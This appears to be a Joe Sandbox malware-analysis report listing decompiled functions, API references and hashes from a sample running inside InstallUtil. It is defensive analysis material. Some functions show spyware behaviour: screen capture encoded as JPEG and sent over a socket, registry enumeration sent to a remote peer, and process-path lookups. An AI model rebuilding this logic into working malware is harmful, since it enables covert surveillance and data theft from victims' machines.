                                                                      • Opcode Fuzzy Hash: f905a2d68622227e5be47e99eb810132b5bf02293294938ac2a4d3deb26d20fb
                                                                      • Instruction Fuzzy Hash: 83113D742003506AD7216735DE89A2F7B9AAB85348F04047EF1C1A76D3DE7C6C55839F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E004445A6(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				void* _t13;
                                                                      				signed int _t15;
                                                                      				WCHAR* _t22;
                                                                      				signed int _t24;
                                                                      				signed int* _t25;
                                                                      				void* _t27;
                                                                      
                                                                      				_t9 = _a4;
                                                                      				_t25 = 0x46d658 + _t9 * 4;
                                                                      				_t24 =  *_t25;
                                                                      				if(_t24 == 0) {
                                                                      					_t22 =  *(0x459c20 + _t9 * 4);
                                                                      					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                      					if(_t27 != 0) {
                                                                      						L8:
                                                                      						 *_t25 = _t27;
                                                                      						if( *_t25 != 0) {
                                                                      							FreeLibrary(_t27);
                                                                      						}
                                                                      						_t13 = _t27;
                                                                      						L11:
                                                                      						return _t13;
                                                                      					}
                                                                      					_t15 = GetLastError();
                                                                      					if(_t15 != 0x57) {
                                                                      						_t27 = 0;
                                                                      					} else {
                                                                      						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                      						_t27 = _t15;
                                                                      					}
                                                                      					if(_t27 != 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						 *_t25 = _t15 | 0xffffffff;
                                                                      						_t13 = 0;
                                                                      						goto L11;
                                                                      					}
                                                                      				}
                                                                      				_t4 = _t24 + 1; // 0xe1ce05ea
                                                                      				asm("sbb eax, eax");
                                                                      				return  ~_t4 & _t24;
                                                                      			}
                                                                      0x004445ab
                                                                      0x004445af
                                                                      0x004445b6
                                                                      0x004445ba
                                                                      0x004445c8
                                                                      0x004445de
                                                                      0x004445e2
                                                                      0x0044460b
                                                                      0x0044460d
                                                                      0x00444611
                                                                      0x00444614
                                                                      0x00444614
                                                                      0x0044461a
                                                                      0x0044461c
                                                                      0x00000000
                                                                      0x0044461d
                                                                      0x004445e4
                                                                      0x004445ed
                                                                      0x004445fc
                                                                      0x004445ef
                                                                      0x004445f2
                                                                      0x004445f8
                                                                      0x004445f8
                                                                      0x00444600
                                                                      0x00000000
                                                                      0x00444602
                                                                      0x00444605
                                                                      0x00444607
                                                                      0x00000000
                                                                      0x00444607
                                                                      0x00444600
                                                                      0x004445bc
                                                                      0x004445c1
                                                                      0x00000000

                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue), ref: 004445D8
                                                                      • GetLastError.KERNEL32(?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue,0045A110,0045A118,00000000,00000364,?,00444327), ref: 004445E4
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue,0045A110,0045A118,00000000), ref: 004445F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 5f683d06c44a4bfe0f7e94e2b9ef38afa2d5335703dfacac1f416157521d427d
                                                                      • Instruction ID: 13903e7306a3e5ddb06965141d1748e220b9e71a834729409bca63e7deab9573
                                                                      • Opcode Fuzzy Hash: 5f683d06c44a4bfe0f7e94e2b9ef38afa2d5335703dfacac1f416157521d427d
                                                                      • Instruction Fuzzy Hash: E901D032611332ABEB214B79EC44B577798AFC5BA2B220631F906D7241D738DC41C6ED
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 19%
                                                                      			E004361A0(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t25;
                                                                      				void* _t27;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				intOrPtr _t30;
                                                                      				intOrPtr* _t32;
                                                                      				void* _t34;
                                                                      
                                                                      				_t29 = __edx;
                                                                      				_t27 = __ebx;
                                                                      				_t36 = _a28;
                                                                      				_t30 = _a8;
                                                                      				if(_a28 != 0) {
                                                                      					_push(_a28);
                                                                      					_push(_a24);
                                                                      					_push(_t30);
                                                                      					_push(_a4);
                                                                      					E004367EF(_t36);
                                                                      					_t34 = _t34 + 0x10;
                                                                      				}
                                                                      				_t37 = _a40;
                                                                      				_push(_a4);
                                                                      				if(_a40 != 0) {
                                                                      					_push(_a40);
                                                                      				} else {
                                                                      					_push(_t30);
                                                                      				}
                                                                      				E00435CC7(_t28);
                                                                      				_t32 = _a32;
                                                                      				_push( *_t32);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_t30);
                                                                      				E004369F1(_t27, _t28, _t29, _t30, _t37);
                                                                      				_push(0x100);
                                                                      				_push(_a36);
                                                                      				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                                      				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                      				_push(_a20);
                                                                      				_push(_a12);
                                                                      				_push(_t30);
                                                                      				_push(_a4);
                                                                      				_t25 = E00435FAA(_t29, _t32, _t37);
                                                                      				if(_t25 != 0) {
                                                                      					E00435C95(_t25, _t30);
                                                                      					return _t25;
                                                                      				}
                                                                      				return _t25;
                                                                      			}
                                                                      0x004361a0
                                                                      0x004361a0
                                                                      0x004361a3
                                                                      0x004361a8
                                                                      0x004361ab
                                                                      0x004361ad
                                                                      0x004361b0
                                                                      0x004361b3
                                                                      0x004361b4
                                                                      0x004361b7
                                                                      0x004361bc
                                                                      0x004361bc
                                                                      0x004361bf
                                                                      0x004361c3
                                                                      0x004361c6
                                                                      0x004361cb
                                                                      0x004361c8
                                                                      0x004361c8
                                                                      0x004361c8
                                                                      0x004361ce
                                                                      0x004361d4
                                                                      0x004361d7
                                                                      0x004361d9
                                                                      0x004361dc
                                                                      0x004361df
                                                                      0x004361e0
                                                                      0x004361e9
                                                                      0x004361ee
                                                                      0x004361f1
                                                                      0x004361f7
                                                                      0x004361fa
                                                                      0x004361fd
                                                                      0x00436200
                                                                      0x00436201
                                                                      0x00436204
                                                                      0x0043620f
                                                                      0x00436213
                                                                      0x00000000
                                                                      0x00436213
                                                                      0x0043621a

                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004361B7
                                                                        • Part of subcall function 004367EF: ___AdjustPointer.LIBCMT ref: 00436839
                                                                      • _UnwindNestedFrames.LIBCMT ref: 004361CE
                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 004361E0
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00436204
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                      • String ID:
                                                                      • API String ID: 2633735394-0
                                                                      • Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                                                                      • Instruction ID: 07ce4a1b62ffed42848294d12b5225ac5bfccbd28765936126b58b9c57da0b16
                                                                      • Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                                                                      • Instruction Fuzzy Hash: 2701D73200050ABBCF125F55CD01EDA7BBAEF4C758F16911AFD5866121C73AE861DBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 22%
                                                                      			E0041871D(void* __ecx, long __edx) {
                                                                      				char _v524;
                                                                      				void* __ebp;
                                                                      				void* _t5;
                                                                      				void* _t11;
                                                                      				long _t14;   /* declaration missing in decompiler output; holds the PID from __edx */
                                                                      				void* _t15;
                                                                      				void* _t16;
                                                                      				void* _t17;
                                                                      
                                                                      				_t14 = __edx;
                                                                      				_t16 = __ecx;
                                                                      				/* 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION; __edx is the process id to open */
                                                                      				_t15 = OpenProcess(0x1000, 0, __edx);
                                                                      				if(_t15 != 0) {
                                                                      					/* indirect call through 0x46dd14 resolves to GetModuleFileNameExW (see APIs below):
                                                                      					   retrieves the main image path of the opened process into _v524 */
                                                                      					_t5 =  *0x46dd14(_t15, 0,  &_v524, 0x208);
                                                                      					_push(_t15);
                                                                      					if(_t5 != 0) {
                                                                      						CloseHandle();
                                                                      						_push( &_v524);   /* success: pass the retrieved path on */
                                                                      					} else {
                                                                      						CloseHandle();
                                                                      						goto L1;
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					_push(0x4610ec);   /* failure: pass a constant string at 0x4610ec instead */
                                                                      				}
                                                                      				E0040413E(_t11, _t16, _t14, _t17);
                                                                      				return _t16;
                                                                      			}


                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732
                                                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00418754
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041875F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418767
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$FileModuleNameOpenProcess
                                                                      • String ID:
                                                                      • API String ID: 3706008839-0
                                                                      • Opcode ID: 390e4fbf3e51ea5e0d103f024a8be72e41443f9446193cad2dedb6c9c84ac5a6
                                                                      • Instruction ID: 05dbcac118bc452bc6cfcfa125cf480762597b572942487dc3779f449db42fd1
                                                                      • Opcode Fuzzy Hash: 390e4fbf3e51ea5e0d103f024a8be72e41443f9446193cad2dedb6c9c84ac5a6
                                                                      • Instruction Fuzzy Hash: E4F02E3164031477D66063649C0DFB7767CC7C4B86F20027BFA54D61D1FE64C8C146AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00435841() {
                                                                      				void* _t4;
                                                                      				void* _t8;
                                                                      				void* __eflags;   /* declaration missing in decompiler output */
                                                                      
                                                                      				/* CRT start-up helper (matches __vcrt_initialize); the callees map to the
                                                                      				   LIBVCRUNTIME routines listed under APIs below */
                                                                      				E00436C50();   /* ___vcrt_initialize_pure_virtual_call_handler */
                                                                      				E004357D5();   /* ___vcrt_initialize_winapi_thunks */
                                                                      				if(E00436D77() != 0) {   /* ___vcrt_initialize_locks */
                                                                      					_t4 = E00436D29(_t8, __eflags);
                                                                      					__eflags = _t4;
                                                                      					if(_t4 != 0) {
                                                                      						return 1;
                                                                      					} else {
                                                                      						E00436DB3();   /* ___vcrt_uninitialize_locks on failure */
                                                                      						goto L1;
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					return 0;
                                                                      				}
                                                                      			}


                                                                      APIs
                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00435841
                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00435846
                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043584B
                                                                        • Part of subcall function 00436D77: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00436D88
                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00435860
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                      • String ID:
                                                                      • API String ID: 1761009282-0
                                                                      • Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                                                                      • Instruction ID: 089b301f4f2539066b24e1bb82f9127eab0f048afea1e0fd140412a00a45b79e
                                                                      • Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                                                                      • Instruction Fuzzy Hash: 2CC04C48600943702E583A7313421EE03545C5E3DCF92B8CFA9955B5179D0D041B6C7F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E00415388(intOrPtr __ecx, void* __eflags, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				char _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v144;
                                                                      				char _v176;
                                                                      				char _v200;
                                                                      				char _v204;
                                                                      				char _v212;
                                                                      				char _v224;
                                                                      				void* _v228;
                                                                      				char _v248;
                                                                      				void* _v252;
                                                                      				void* _v276;
                                                                      				char _v288;
                                                                      				char* _v304;
                                                                      				intOrPtr _v308;
                                                                      				char _v312;
                                                                      				void* _v316;
                                                                      				void* _v328;
                                                                      				char _v332;
                                                                      				char _v336;
                                                                      				char _v340;
                                                                      				char _v356;
                                                                      				char _v360;
                                                                      				void* _v364;
                                                                      				void* _v388;
                                                                      				intOrPtr _v428;
                                                                      				signed int _v432;
                                                                      				char _v448;
                                                                      				char _v452;
                                                                      				char _v456;
                                                                      				intOrPtr _v464;
                                                                      				signed int _v468;
                                                                      				void* _v476;
                                                                      				char _v480;
                                                                      				char _v484;
                                                                      				char _v500;
                                                                      				char _v504;
                                                                      				char _v524;
                                                                      				intOrPtr _v528;
                                                                      				void* _v532;
                                                                      				intOrPtr _v540;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t90;
                                                                      				void* _t124;
                                                                      				void* _t126;
                                                                      				void* _t140;
                                                                      				void* _t141;
                                                                      				void* _t165;
                                                                      				intOrPtr* _t166;
                                                                      				intOrPtr _t167;
                                                                      				char* _t174;
                                                                      				intOrPtr _t245;
                                                                      				intOrPtr _t258;
                                                                      				intOrPtr* _t269;
                                                                      				void* _t271;
                                                                      				intOrPtr _t273;
                                                                      				void* _t279;
                                                                      				void* _t280;
                                                                      				signed int _t281;
                                                                      				void* _t283;
                                                                      				void* _t284;
                                                                      				/* temporaries used below but not declared in the decompiler output */
                                                                      				intOrPtr _t246;
                                                                      				intOrPtr _t276;
                                                                      				intOrPtr _t287;
                                                                      				void* _t115;
                                                                      				void* _t133;
                                                                      				void* _t149;
                                                                      
                                                                      				_t283 = (_t281 & 0xfffffff8) - 0x1b4;
                                                                      				_t245 = _a12;
                                                                      				_push(_t165);
                                                                      				_t273 = __ecx;
                                                                      				 *0x46de68 = _t245;
                                                                      				_push(_t245);
                                                                      				_t246 = _a8;
                                                                      				_v428 = __ecx;
                                                                      				_v432 = _a4 & 0x000000ff;
                                                                      				E0041578F( &_v356, _a8, __eflags);
                                                                      				if(E0040243C() != 0) {
                                                                      					_t174 =  &_v356;
                                                                      					_t90 =  *0x46dd04(E00401F6B(_t174), E0040243C());
                                                                      					_t166 = _t90;
                                                                      					E004151A8( &_v340, _t166);
                                                                      					E00415B45(L"image/jpeg",  &_v204);
                                                                      					_v332 = 1;
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					_v312 = 1;
                                                                      					_v308 = 4;
                                                                      					_v304 =  &_v448;
                                                                      					_v452 = 0;
                                                                      					_t269 =  *0x46dd04(0, 0, _t174);
                                                                      					E0041523F( &_v212,  &_v356, _t269,  &_v212,  &_v340);
                                                                      					 *((intOrPtr*)( *_t269 + 0x30))(_t269,  &_v112, 1);
                                                                      					E004051E3(_t166,  &_v452,  &_v204, _t269, _t280, _v116, 0);
                                                                      					asm("xorps xmm0, xmm0");
                                                                      					asm("movlpd [esp+0x30], xmm0");
                                                                      					 *((intOrPtr*)( *_t269 + 0x14))(_t269, _v468, _v464, 0, 0);
                                                                      					_t276 =  *_t269;
                                                                      					 *((intOrPtr*)( *_t269 + 0xc))(_t269, E00401F6B( &_v480), _v144, 0);
                                                                      					 *((intOrPtr*)( *_t166 + 8))(_t166);
                                                                      					 *((intOrPtr*)( *_t269 + 8))(_t269);
                                                                      					E0043DDD1( &_v504, E0040243C(),  &_v524, 0xa);
                                                                      					_t167 = _v528;
                                                                      					_t284 = _t283 + 0xc;
                                                                      					__eflags =  *((intOrPtr*)(_t167 + 4)) - 0xffffffff;
                                                                      					if( *((intOrPtr*)(_t167 + 4)) != 0xffffffff) {
                                                                      						_t284 = _t284 - 0x18;
                                                                      						E00402ED0(_t167, _t284, E004052F5( &_v456,  &_v500, _t280, 0x46e260), _t280, __eflags,  &_v480);
                                                                      						_push(0x4d);
                                                                      						_v540 = E00404A78(_t167, _t115, __eflags);
                                                                      						goto L10;
                                                                      					} else {
                                                                      						E00404804(_t167);
                                                                      						_t124 = E0040489F(_t167, _t276, _t167);
                                                                      						__eflags = _t124;
                                                                      						if(_t124 != 0) {
                                                                      							E00404BBC(_t167, E00415E25);
                                                                      							_t271 = _t167 + 0x80;
                                                                      							_t126 = E0040ECD0(__eflags);
                                                                      							_t284 = _t284 - 0x18;
                                                                      							__eflags = _t126;
                                                                      							_t279 = _t284;
                                                                      							_push( &_v484);
                                                                      							if(_t126 == 0) {
                                                                      								E00402ED0(_t167, _t279, E00402ED0(_t167,  &_v456, E00402ED0(_t167,  &_v288, E00402ED0(_t167,  &_v312, E00402ED0(_t167,  &_v336, E004052F5( &_v360,  &_v500, _t280, 0x46e260), _t280, __eflags, _t271), _t280, __eflags, 0x46e260), _t280, __eflags, _t167 + 0x98), _t280, __eflags, 0x46e260), _t280, __eflags);
                                                                      								_push(0x10);
                                                                      								_v540 = E00404A78(_t167, _t133, __eflags);
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      							} else {
                                                                      								_t140 = E004183E5( &_v456, 0x46e980);
                                                                      								_t258 =  *0x46dd64; // 0x0
                                                                      								_t141 = E004182D1(_t167,  &_v288, _t258);
                                                                      								E00402ED0(_t167, _t279, E00402ED0(_t167,  &_v248, E00402E61( &_v224, E00402ED0(_t167,  &_v200, E00402E61( &_v176, E00402ED0(_t167,  &_v360, E00402ED0(_t167,  &_v336, E004052F5( &_v312,  &_v500, _t280, 0x46e260), _t280, __eflags, _t271), _t280, __eflags, 0x46e260), _t141), _t280, __eflags, 0x46e260), _t140), _t280, __eflags, 0x46e260), _t280, __eflags);
                                                                      								_push(0x10);
                                                                      								_v540 = E00404A78(_t167, _t149, __eflags);
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								E00401F98();
                                                                      								L10:
                                                                      							}
                                                                      							E00401F98();
                                                                      						}
                                                                      					}
                                                                      					E004151CB(E00401F98(), _t284 + 0x78);
                                                                      				} else {
                                                                      					_t287 =  *((intOrPtr*)(_t273 + 4)) - 0xffffffff;
                                                                      					if( *((intOrPtr*)(_t273 + 4)) == 0xffffffff) {
                                                                      						E00404804(_t273);
                                                                      						E0040489F(_t273, _t273, _t273);
                                                                      					}
                                                                      					_t284 = _t283 - 0x18;
                                                                      					E004020B6(_t165, _t284, _t246, _t287, _t273 + 0x80);
                                                                      					_push(0x4e);
                                                                      					E00404A78(_t273, _t246, _t287);
                                                                      					_v468 = _v468 & 0x00000000;
                                                                      				}
                                                                      				E00401F98();
                                                                      				return  *((intOrPtr*)(_t284 + 0x10));
                                                                      			}

                                                                      0x00415514
                                                                      0x00415517
                                                                      0x0041551b
                                                                      0x0041572a
                                                                      0x0041574b
                                                                      0x00415751
                                                                      0x0041575a
                                                                      0x00000000
                                                                      0x00415521
                                                                      0x00415523
                                                                      0x0041552b
                                                                      0x00415530
                                                                      0x00415532
                                                                      0x0041553f
                                                                      0x00415544
                                                                      0x00415551
                                                                      0x00415556
                                                                      0x00415559
                                                                      0x0041555f
                                                                      0x00415561
                                                                      0x00415562
                                                                      0x004156e1
                                                                      0x004156e7
                                                                      0x004156f4
                                                                      0x004156f8
                                                                      0x00415704
                                                                      0x00415710
                                                                      0x0041571c
                                                                      0x00415568
                                                                      0x00415576
                                                                      0x0041557b
                                                                      0x0041558e
                                                                      0x0041560b
                                                                      0x00415611
                                                                      0x00415621
                                                                      0x00415625
                                                                      0x00415631
                                                                      0x0041563d
                                                                      0x00415649
                                                                      0x00415655
                                                                      0x00415661
                                                                      0x0041566d
                                                                      0x00415679
                                                                      0x0041575e
                                                                      0x0041575e
                                                                      0x00415762
                                                                      0x00415762
                                                                      0x00415532
                                                                      0x00415774
                                                                      0x004153c9
                                                                      0x004153c9
                                                                      0x004153cd
                                                                      0x004153d1
                                                                      0x004153d9
                                                                      0x004153d9
                                                                      0x004153de
                                                                      0x004153ea
                                                                      0x004153ef
                                                                      0x004153f3
                                                                      0x004153f8
                                                                      0x004153f8
                                                                      0x0041577d
                                                                      0x0041578c

                                                                      APIs
                                                                        • Part of subcall function 0041578F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
                                                                        • Part of subcall function 0041578F: CreateCompatibleDC.GDI32(00000000), ref: 004157B6
                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00415416
                                                                      • SHCreateMemStream.SHLWAPI(00000000), ref: 00415479
                                                                        • Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$Stream$Compatibleconnectsend
                                                                      • String ID: image/jpeg
                                                                      • API String ID: 516589181-3785015651
                                                                      • Opcode ID: 83ee22bbd1a34b9ee764d83720ab625f7214ed777109a353386459ed2cdc77f6
                                                                      • Instruction ID: 4058b72579c310cd81e2948a9c51c1c8e3e122ec86b96921c0c29db8d613141b
                                                                      • Opcode Fuzzy Hash: 83ee22bbd1a34b9ee764d83720ab625f7214ed777109a353386459ed2cdc77f6
                                                                      • Instruction Fuzzy Hash: 88A19F316083449BC324FB21D895AEFB3E5AFD5304F00493EB58A971D1EF789945CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0043EDAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 7466ca200bdf16320e5c9faf2f8782d7d1fa97e8da5c636b47dafc4924c5a37d
                                                                      • Instruction ID: 993812ce7a3d439e8a8fc006798ed59a631e5dedc3a56f6363c517c5d0bed230
                                                                      • Opcode Fuzzy Hash: 7466ca200bdf16320e5c9faf2f8782d7d1fa97e8da5c636b47dafc4924c5a37d
                                                                      • Instruction Fuzzy Hash: 8051506190920396EB127B16CD0637B3B949B44701F345D6BF0D5423E9EB3DCC95AA4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00411281(short* __ecx, char __edx, void* __eflags, char _a4) {
                                                                      				void* _v16;
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				void* _v56;
                                                                      				char _v76;
                                                                      				void* _v80;
                                                                      				char _v100;
                                                                      				void* _v104;
                                                                      				char _v124;
                                                                      				void* _v128;
                                                                      				char _v148;
                                                                      				void* _v152;
                                                                      				char _v172;
                                                                      				void* _v176;
                                                                      				char _v196;
                                                                      				void* _v200;
                                                                      				char _v220;
                                                                      				void* _v224;
                                                                      				char _v225;
                                                                      				void* _v228;
                                                                      				void* _v248;
                                                                      				void* _v268;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				void* _t28;
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      				void* _t61;
                                                                      				short* _t116;
                                                                      				void* _t120;
                                                                      				void* _t123;
                                                                      				void* _t124;
                                                                      
                                                                      				_t103 = __edx;
                                                                      				_t123 =  &_v228 - 0x18;
                                                                      				_v225 = __edx;
                                                                      				_t116 = __ecx;
                                                                      				E004020B6(_t61, _t123, __edx, __eflags,  &_a4);
                                                                      				_t28 = E004111F0(_t61, __eflags);
                                                                      				_t124 = _t123 + 0x18;
                                                                      				_t62 = 0;
                                                                      				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
                                                                      					E00402053(0, _t124 - 0x18, _t103, _t120, "3");
                                                                      					_push(0x72);
                                                                      					E00404A78(0x46e7b8, _t103, __eflags);
                                                                      				} else {
                                                                      					E00410FC9(_v224, _t103);
                                                                      					_t35 = E00418445(0,  &_v28, 0x46e788);
                                                                      					_t36 = E00418445(0x46e770,  &_v52, 0x46e770);
                                                                      					_t129 = _v225;
                                                                      					_t107 =  ==  ? "0" : "1";
                                                                      					_t114 = E00402ED0(0x46e770,  &_v220, E00402ED0(0x46e770,  &_v196, E00402ED0(0x46e770,  &_v172, E00402E61( &_v148, E00402ED0(0x46e770,  &_v124, E00402E61( &_v100, E004052F5( &_v76,  ==  ? "0" : "1", 0x46e788, 0x46e260), _t36), 0x46e788, _v225, 0x46e260), _t35), 0x46e788, _v225, 0x46e260), 0x46e788, _v225, 0x46e7a0), 0x46e788, _t129, 0x46e260);
                                                                      					E00402ED0(0x46e770, _t124 - 0x18, _t44, 0x46e788, _t129, 0x46e838);
                                                                      					_push(0x71);
                                                                      					E00404A78(0x46e7b8, _t44, _t129);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					L00409F8A(0x46e770, 0x46e788, _t44, 0x4610ec);
                                                                      					L00409F8A(0x46e770, 0x46e770, _t114, 0x4610ec);
                                                                      					L00405A7D(0x46e770, 0x46e7a0, _t114, 0x461084);
                                                                      					L00405A7D(0x46e770, 0x46e838, _t114, 0x461084);
                                                                      					RegCloseKey(_v268);
                                                                      					_t62 = 1;
                                                                      				}
                                                                      				E00401F98();
                                                                      				return _t62;
                                                                      			}

                                                                      0x00411281
                                                                      0x0041128b
                                                                      0x0041128e
                                                                      0x00411292
                                                                      0x0041129e
                                                                      0x004112a3
                                                                      0x004112a8
                                                                      0x004112af
                                                                      0x004112c2
                                                                      0x0041143c
                                                                      0x00411441
                                                                      0x00411448
                                                                      0x004112c8
                                                                      0x004112cc
                                                                      0x004112f5
                                                                      0x0041130a
                                                                      0x0041130f
                                                                      0x00411327
                                                                      0x00411381
                                                                      0x00411385
                                                                      0x0041138b
                                                                      0x00411392
                                                                      0x0041139b
                                                                      0x004113a4
                                                                      0x004113ad
                                                                      0x004113b6
                                                                      0x004113bf
                                                                      0x004113cb
                                                                      0x004113d7
                                                                      0x004113e3
                                                                      0x004113ef
                                                                      0x004113fc
                                                                      0x00411404
                                                                      0x00411414
                                                                      0x0041141f
                                                                      0x00411428
                                                                      0x0041142e
                                                                      0x0041142e
                                                                      0x00411454
                                                                      0x00411465

                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 004112BA
                                                                        • Part of subcall function 00410FC9: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00411030
                                                                        • Part of subcall function 00410FC9: RegEnumKeyExW.ADVAPI32 ref: 0041105F
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • RegCloseKey.ADVAPI32(00000000,00461084,00461084,004610EC,004610EC,00000071), ref: 00411428
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
